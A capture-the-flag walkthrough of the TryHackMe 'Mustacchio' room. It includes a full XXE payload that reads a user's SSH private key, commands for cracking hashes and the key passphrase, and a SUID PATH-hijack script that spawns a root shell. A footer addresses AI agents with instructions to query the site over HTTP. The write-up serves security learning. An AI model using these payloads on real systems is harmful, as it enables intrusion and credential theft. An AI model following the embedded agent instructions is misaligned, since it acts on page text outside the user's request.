# Mustacchio

## Nmap

Start by running Nmap on all ports. We then find that SSH is open, a website on port 80 and a admin login page at port 8765.

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 581b0c0ffacf05be4cc07af1f188611c (RSA)
|   256 3cfce8a37e039a302c77e00a1ce452e6 (ECDSA)
|_  256 9d59c6c779c554c41daae4d184710192 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Mustacchio | Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Gobuster

Next, I ran Gobuster which found the directory /custom. In that folder we find a file called users.bak.

{% code overflow="wrap" %}

```bash
gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x  "php, txt" | tee gobuster.log
```

{% endcode %}

## SQLite3

Once the users.bak is downloaded, we can see that it is a SQLite database.

{% code overflow="wrap" lineNumbers="true" %}

```bash
file users.bak                                                                                                               
users.bak: SQLite 3.x database, last written using SQLite version 3034001, file counter 2, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 2
```

{% endcode %}

It can be opened with the command `sqlite3 users.bak` and we can view the content as such:

{% code overflow="wrap" lineNumbers="true" %}

```bash
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
```

{% endcode %}

## Cracking the admin password

The password is a SHA-1 hash and can be cracked easily at <https://crackstation.net/>

## Login to the admin page

Once we have the credentials, we can use them to login to the admin page a port 8765. At this page we can "Add a comment on the website". If we inspect the Source code of the site we find the following.

```html
<script type="text/javascript">
      //document.cookie = "Example=/auth/dontforget.bak"; 
      function checktarea() {
      let tbox = document.getElementById("box").value;
      if (tbox == null || tbox.length == 0) {
        alert("Insert XML Code!")
      }
  }
</script>
</head>
<body>

    <!-- Barry, you can now SSH in using your key!-->
```

This gives us three pieces of valuable information

1. Someone called Barry can login with his SSH
2. We must perform an XXE attack as we can pass XML to the submit form.
3. The path /auth/dontforget.bak looks interesting

If we start from the bottom, we can download the dontforget.bak file and view its content using the `cat` command.

{% code overflow="wrap" lineNumbers="true" %}

```bash
cat dontforget.bak 
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>  
```

{% endcode %}

This gives us the basic XML form we need to provide. We can combine it with a XXE payload to view the id\_rsa key of Barry.

{% code overflow="wrap" lineNumbers="true" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>  
```

{% endcode %}

## id\_rsa

Once the id\_rsa is obtained we can try to login with SSH as Barry - remember to modify the permissions of the key `chmod 600 id_rsa`

```bash
ssh barry@$IP -i id_rsa
```

However, we are prompted for a password which is not the same we used to login to the admin page.

## Obtain the password with John

We can use ssh2john and JohnTheRipper to crack the password.

First, convert the key to right format then use John to crack it.

{% code lineNumbers="true" %}

```bash
ssh2john id_rsa > barryhash                        
john barryhash --wordlist=/usr/share/wordlists/rockyou.txt
```

{% endcode %}

## Get first flag

Once we have logged in a Barry, we can get the first flag by viewing the file /home/barry/user.txt

## Get root

Now, we start by looking SUIDs with the command `find / -perm -u=s -type f 2>/dev/null`

which shows us that we can execute `/home/joe/live_log` as root.&#x20;

If we use strings on that file, we find this interesting snippet.

`tail -f /var/log/nginx/access.log`

This seems to be a command that is executed. The proper way of doing this is probally some reverse engineering, but since we kinda know what to look for this is sufficient.

Let's try to create a custom tail binary and try to hijack the path. The content of tail should look like this. A Bash script that will copy /bin/bash to the /tmp folder and set the correct privileges.

```
#!/bin/bash
cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash
```

Next, we modify the PATH variable and execute the log file.

{% code lineNumbers="true" %}

```bash
export PATH=`pwd`:$PATH
/home/joe/live_log
```

{% endcode %}

If everything was successful, we can now obtain a shell with root privileges by executing `/tmp/bash -p`

We can verify that we have root privileges with the `id` command.

```
barry@mustacchio:/dev/shm$ /tmp/bash -p
bash-4.3# id
uid=1003(barry) gid=1003(barry) euid=0(root) groups=1003(barry),4(adm)
```

Now, find the last flag - */root/root.txt*


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security.andreasbreum.com/capture-the-flag/tryhackme-rooms/mustacchio.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.